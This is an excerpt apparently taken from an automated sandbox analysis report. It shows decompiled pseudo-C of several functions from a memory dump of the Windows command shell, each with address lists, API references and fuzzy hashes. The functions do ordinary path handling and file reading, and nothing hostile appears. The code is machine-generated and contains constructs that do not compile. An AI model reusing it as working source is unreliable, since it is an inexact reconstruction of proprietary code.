								_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
								 *(_t226 - 0xc0) = _t121;
								_t188 = _t188 + 1;
								_t216 =  &(( *(_t226 - 0xbc))[1]);
								 *(_t226 - 0xbc) = _t216;
								if( *_t121 != 0) {
									continue;
								}
								goto L33;
							}
							goto L33;
						}
						goto L48;
					}
					_t137 =  *(_t226 - 0xbc);
					_t235 =  *(_t137[0xe]) - _t224;
					if( *(_t137[0xe]) != _t224) {
						_t97 =  *(_t226 + 8);
						goto L38;
					}
					_t225 = _t158[0x44];
					E011E1040(_t216,  *(_t226 + 8),  *_t225);
					( *0x1213cc4)[2] = _t225[2];
					goto L8;
				}
			}







































                                    0x011e1f52
                                    0x011e1f57
                                    0x011e1f5c
                                    0x011e1f61
                                    0x011e1f63
                                    0x011e1f65
                                    0x011e1f6b
                                    0x011e1f71
                                    0x011e1f74
                                    0x011e1f7a
                                    0x011e1f80
                                    0x011e1f8a
                                    0x011e1fa3
                                    0x011e1fab
                                    0x011e1fb1
                                    0x011e1fb7
                                    0x011e1fba
                                    0x011e1fc0
                                    0x011e1fc9
                                    0x011e1fcf
                                    0x011e1fd7
                                    0x011ed476
                                    0x011e1fdd
                                    0x011e1fe0
                                    0x011e1fe4
                                    0x011e1fee
                                    0x011e1fee
                                    0x011e1fe4
                                    0x011e1ffb
                                    0x011ed4a4
                                    0x00000000
                                    0x011e2001
                                    0x011e2001
                                    0x011e2026
                                    0x011e202e
                                    0x011e2031
                                    0x011ed47c
                                    0x011ed482
                                    0x011ed484
                                    0x011ed485
                                    0x011ed48a
                                    0x011ed493
                                    0x011ed493
                                    0x011ed493
                                    0x011ed494
                                    0x011e2281
                                    0x011e2286
                                    0x011e2286
                                    0x011e2037
                                    0x011e2037
                                    0x011e203e
                                    0x011e2044
                                    0x011e204a
                                    0x011e2050
                                    0x011e2053
                                    0x011e2055
                                    0x011e2058
                                    0x011e2062
                                    0x011e2294
                                    0x011e229e
                                    0x011e22a0
                                    0x011e2098
                                    0x011e2098
                                    0x011e20a5
                                    0x011e20aa
                                    0x011e20b2
                                    0x011ed4fa
                                    0x011ed4fb
                                    0x011ed4fb
                                    0x011ed502
                                    0x00000000
                                    0x011ed504
                                    0x011e20c5
                                    0x011e20ca
                                    0x011e20cc
                                    0x011e20cf
                                    0x011e20cf
                                    0x011e20d2
                                    0x011e20d5
                                    0x011e20df
                                    0x011e20e2
                                    0x011e20ea
                                    0x011e20ed
                                    0x011e20f7
                                    0x011e2102
                                    0x011e2106
                                    0x011e2106
                                    0x011e2114
                                    0x011e2119
                                    0x011e211b
                                    0x011e211e
                                    0x011e211e
                                    0x011e2121
                                    0x011e2124
                                    0x011e2132
                                    0x011e2137
                                    0x011e213c
                                    0x011e2142
                                    0x011e2147
                                    0x011ed50c
                                    0x011ed50c
                                    0x00000000
                                    0x011ed50c
                                    0x011e214d
                                    0x011e2153
                                    0x011e2158
                                    0x011e2159
                                    0x011e215f
                                    0x011e215f
                                    0x011e2162
                                    0x011e2164
                                    0x011e2167
                                    0x011e2167
                                    0x011e216c
                                    0x011e2175
                                    0x011e22ab
                                    0x011e22ae
                                    0x011e226f
                                    0x011e2274
                                    0x011e2278
                                    0x00000000
                                    0x011e227f
                                    0x011e2191
                                    0x011e2198
                                    0x011e219d
                                    0x00000000
                                    0x00000000
                                    0x011e21a3
                                    0x011e21a5
                                    0x011e21a5
                                    0x011e21a8
                                    0x011e21a8
                                    0x011e21ab
                                    0x011e21ae
                                    0x011e21b7
                                    0x011e21ba
                                    0x011e21be
                                    0x011e21c5
                                    0x011e2289
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e21c5
                                    0x011e21da
                                    0x011e21e3
                                    0x011ed514
                                    0x011ed517
                                    0x011ed519
                                    0x011ed521
                                    0x011ed523
                                    0x011ed529
                                    0x011ed52b
                                    0x00000000
                                    0x00000000
                                    0x011ed531
                                    0x011ed538
                                    0x011ed53f
                                    0x011ed543
                                    0x00000000
                                    0x00000000
                                    0x011ed545
                                    0x011ed54b
                                    0x011ed551
                                    0x011ed556
                                    0x011ed55c
                                    0x011ed55c
                                    0x011ed55f
                                    0x011ed562
                                    0x011ed562
                                    0x011ed56f
                                    0x011ed574
                                    0x00000000
                                    0x011ed574
                                    0x011ed517
                                    0x011e21e9
                                    0x011e21f5
                                    0x011e21fa
                                    0x011e2200
                                    0x011e2209
                                    0x011e226c
                                    0x011e226c
                                    0x00000000
                                    0x011e226c
                                    0x011e220b
                                    0x011e220e
                                    0x011e2216
                                    0x011e2217
                                    0x011e221c
                                    0x011e221f
                                    0x011e2221
                                    0x011e2224
                                    0x011e222a
                                    0x011e222a
                                    0x011e222d
                                    0x011e2230
                                    0x011e223b
                                    0x011e2243
                                    0x011e224e
                                    0x011e2251
                                    0x011e2257
                                    0x011e225e
                                    0x011e2261
                                    0x011e226a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e226a
                                    0x00000000
                                    0x011e2217
                                    0x00000000
                                    0x011e22a6
                                    0x011e2068
                                    0x011e2071
                                    0x011e2074
                                    0x011e2291
                                    0x00000000
                                    0x011e2291
                                    0x011e207a
                                    0x011e2087
                                    0x011e2095
                                    0x00000000
                                    0x011e2095

                                    APIs
                                    • memset.MSVCRT ref: 011E1FA3
                                    • wcsspn.MSVCRT ref: 011E2181
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2278
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                    • String ID:
                                    • API String ID: 1535828850-0
                                    • Opcode ID: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction ID: d3a4a764105d28c0265579dc273ab993552439345fa951b2646c1cd28c9dcc11
                                    • Opcode Fuzzy Hash: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction Fuzzy Hash: A1C19E75A00605CFDB29DFA8D898BA9B7F6BF54304F14819DD50A9B394DB309A82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3B5D, Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E011E3B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E011E00B0(0xffce);
					if(_t87 == 0) {
						L22:
						E011F9287(0xffce);
						__imp__longjmp(0x120b8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E011DC923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E011E00B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0x1213cec = _t63;
							E011E36CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E011E2D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E011E2349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E011E0D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E011DC923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0x1213cf0 = _t65;
								 *_t84 = _v556;
								if( *0x1213cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}



























                                    0x011e3b5d
                                    0x011e3b68
                                    0x011e3b6f
                                    0x011e3b7a
                                    0x011e3b7e
                                    0x011e3b80
                                    0x011e3b8a
                                    0x011e3b8f
                                    0x011e3b91
                                    0x011e3bb7
                                    0x011e3cf0
                                    0x011e3cf2
                                    0x011e3bbd
                                    0x011e3bbf
                                    0x011e3bc5
                                    0x011e3bc9
                                    0x011ee009
                                    0x011ee009
                                    0x011ee015
                                    0x00000000
                                    0x011e3bcf
                                    0x011e3bd1
                                    0x011e3bd3
                                    0x011e3be0
                                    0x011e3be3
                                    0x011e3beb
                                    0x011e3bf1
                                    0x011e3bf8
                                    0x00000000
                                    0x011e3bfe
                                    0x011e3c04
                                    0x011e3c0b
                                    0x011e3c10
                                    0x011e3c15
                                    0x011ee01b
                                    0x011ee01b
                                    0x011ee01b
                                    0x011e3c15
                                    0x011e3bf8
                                    0x011e3c21
                                    0x011e3c2b
                                    0x00000000
                                    0x011e3c31
                                    0x011e3c31
                                    0x011e3c36
                                    0x011ee026
                                    0x011ee026
                                    0x011e3c3e
                                    0x011e3c3f
                                    0x011e3c48
                                    0x011e3c4c
                                    0x011e3c51
                                    0x011ee031
                                    0x011ee031
                                    0x011e3c5d
                                    0x011e3c64
                                    0x011e3d10
                                    0x011e3d12
                                    0x011e3d1d
                                    0x011e3c6a
                                    0x011e3c6a
                                    0x011e3c6f
                                    0x011e3c73
                                    0x00000000
                                    0x011e3c79
                                    0x011e3c7b
                                    0x011e3c7f
                                    0x011e3c81
                                    0x011e3c89
                                    0x011e3d22
                                    0x011e3d22
                                    0x011e3c8f
                                    0x011e3c8f
                                    0x011e3c98
                                    0x011e3c9a
                                    0x011e3c9f
                                    0x00000000
                                    0x00000000
                                    0x011e3ca1
                                    0x011e3ca1
                                    0x011e3ca7
                                    0x00000000
                                    0x011e3ca9
                                    0x011e3cab
                                    0x011e3caf
                                    0x00000000
                                    0x00000000
                                    0x011e3caf
                                    0x00000000
                                    0x011e3ca7
                                    0x011ee03c
                                    0x00000000
                                    0x011ee03c
                                    0x011e3c89
                                    0x011e3cb1
                                    0x011e3cba
                                    0x011e3cc2
                                    0x011e3cce
                                    0x011e3cd6
                                    0x011e3cd6
                                    0x011e3cde
                                    0x011e3ce4
                                    0x011e3cee
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e3cee
                                    0x011e3c73
                                    0x011e3c64
                                    0x011e3c2b
                                    0x011e3cf6
                                    0x011e3d0f

                                    APIs
                                    • memset.MSVCRT ref: 011E3B91
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3CF6
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,-00000001,00000000,?,00000000), ref: 011EE015
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9CF
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9E5
                                      • Part of subcall function 011DC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                      • Part of subcall function 011DC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 011E3CC5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E3CD0
                                      • Part of subcall function 011E2349: wcsrchr.MSVCRT ref: 011E234F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                    • String ID:
                                    • API String ID: 3402406610-0
                                    • Opcode ID: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction ID: ae59b34ea5c5032b665c0d0424968dee3e3e5ff6580ad2d72d3ef3260354f571
                                    • Opcode Fuzzy Hash: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction Fuzzy Hash: 9C51B331A006169BDB3CDBE9A84C67EBBF5FF58714F54046AE919D7280EB30C980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB710, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 66%
                                    			E011DB710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0x120b8f8);
				L011E82C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0x120b8b0 = 1;
					L12:
					return E011E6FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0x1213ccc == 0) {
					if( *0x1218058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0x1213cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E011E5FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E011DB97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0x120b8b0 = _t67;
						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}
























                                    0x011db71b
                                    0x011db722
                                    0x011db725
                                    0x011db72b
                                    0x011db72d
                                    0x011db733
                                    0x011db734
                                    0x011db739
                                    0x011db741
                                    0x011db745
                                    0x011e9d59
                                    0x011db877
                                    0x011db889
                                    0x011db889
                                    0x011db751
                                    0x011e9d6a
                                    0x00000000
                                    0x00000000
                                    0x011e9d70
                                    0x011e9d78
                                    0x011db759
                                    0x011db75e
                                    0x011db76b
                                    0x011db773
                                    0x011db779
                                    0x011db77f
                                    0x011db787
                                    0x011db790
                                    0x011db793
                                    0x011db799
                                    0x011db7a9
                                    0x011db7c4
                                    0x011db7e7
                                    0x011db7ec
                                    0x011e9d83
                                    0x011e9d83
                                    0x011db7f2
                                    0x011db7fa
                                    0x011e9d8e
                                    0x011e9d8e
                                    0x011db811
                                    0x011db82a
                                    0x011db82e
                                    0x011db835
                                    0x011db88c
                                    0x011db88c
                                    0x011db837
                                    0x011db83f
                                    0x011db894
                                    0x011db894
                                    0x011db858
                                    0x011db858
                                    0x011db82e
                                    0x011db85d
                                    0x011db863
                                    0x011db870
                                    0x00000000
                                    0x011db876
                                    0x011e9d7e
                                    0x011db757
                                    0x011db757
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_setjmp3
                                    • String ID:
                                    • API String ID: 4215035025-0
                                    • Opcode ID: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction ID: 3f139567240e9f0b455cbc1c4d7c3ad1a7aa79a9b5a0e0ac35a533ea88d43fc1
                                    • Opcode Fuzzy Hash: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction Fuzzy Hash: 6A41B271E052299FDF29CAA5DC88AEEBBB4FB45304F0401ADE609A3140DB309A84CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8F66, Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E011F8F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E011E2D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E011E2D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}






















                                    0x011f8f66
                                    0x011f8f71
                                    0x011f8f78
                                    0x011f8f83
                                    0x011f8f8b
                                    0x011f8f8d
                                    0x011f8f99
                                    0x011f8fa1
                                    0x011f8fa3
                                    0x011f8fa5
                                    0x011f8fad
                                    0x011f8fb5
                                    0x011f8fb9
                                    0x011f8fc5
                                    0x011f8ff1
                                    0x011f9082
                                    0x011f9085
                                    0x011f9092
                                    0x011f90ab
                                    0x011f901a
                                    0x011f901a
                                    0x011f9022
                                    0x011f9024
                                    0x011f9024
                                    0x011f902a
                                    0x011f9038
                                    0x011f903a
                                    0x011f903f
                                    0x011f9041
                                    0x011f9041
                                    0x011f9047
                                    0x011f9052
                                    0x011f9054
                                    0x011f9059
                                    0x011f905b
                                    0x011f905b
                                    0x011f9061
                                    0x011f9069
                                    0x011f906b
                                    0x011f906b
                                    0x011f9073
                                    0x011f907e
                                    0x011f9081
                                    0x011f9081
                                    0x011f9052
                                    0x00000000
                                    0x011f9038

                                    APIs
                                    • memset.MSVCRT ref: 011F8FA5
                                    • memset.MSVCRT ref: 011F8FC5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcsicmp.MSVCRT ref: 011F9073
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9085
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9092
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_wcsicmp
                                    • String ID:
                                    • API String ID: 1670951261-0
                                    • Opcode ID: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                    • Instruction ID: 24969437e27e406e2c8bd999c452609998dcf48dbfd9787ffe554203ceaac5a3
                                    • Opcode Fuzzy Hash: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                    • Instruction Fuzzy Hash: B7316B71A0021E57DF29DAA5DC58BEEBBB8EF54358F0401ADFA05D3141DB749E80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8E52, Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E011F8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E011D5DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E011F985A(_t52);
					L2:
					E011F85E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E011F6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0x1213cf0 = GetLastError();
				E011DDB92(_t61);
				_push(0);
				_push( *0x1213cf0);
				E011DC5A2(_t61);
				goto L2;
			}


















                                    0x011f8e5a
                                    0x011f8e5e
                                    0x011f8e65
                                    0x011f8e66
                                    0x011f8e69
                                    0x011f8e6c
                                    0x011f8e72
                                    0x011f8e77
                                    0x011f8e7b
                                    0x011f8e7c
                                    0x011f8e81
                                    0x011f8e86
                                    0x011f8e86
                                    0x011f8e8b
                                    0x011f8e8e
                                    0x011f8e90
                                    0x011f8e99
                                    0x011f8ea9
                                    0x00000000
                                    0x00000000
                                    0x011f8eaf
                                    0x011f8eb2
                                    0x011f8eb5
                                    0x011f8eb7
                                    0x011f8ec0
                                    0x011f8ec5
                                    0x011f8edc
                                    0x011f8edc
                                    0x011f8ec7
                                    0x011f8ecf
                                    0x011f8ed2
                                    0x00000000
                                    0x011f8ed4
                                    0x011f8ed4
                                    0x011f8ed4
                                    0x011f8ed2
                                    0x011f8ee2
                                    0x011f8ee2
                                    0x011f8ee7
                                    0x011f8f10
                                    0x011f8ee9
                                    0x011f8efe
                                    0x011f8f06
                                    0x011f8f08
                                    0x011f8f0b
                                    0x011f8f0b
                                    0x011f8f16
                                    0x00000000
                                    0x00000000
                                    0x011f8f1e
                                    0x011f8f23
                                    0x011f8f27
                                    0x011f8f2f
                                    0x011f8f2f
                                    0x011f8f3d
                                    0x011f8f3d
                                    0x011f8f48
                                    0x011f8f4d
                                    0x011f8f52
                                    0x011f8f54
                                    0x011f8f5a
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F8E99
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F8EA1
                                    • _get_osfhandle.MSVCRT ref: 011F8F27
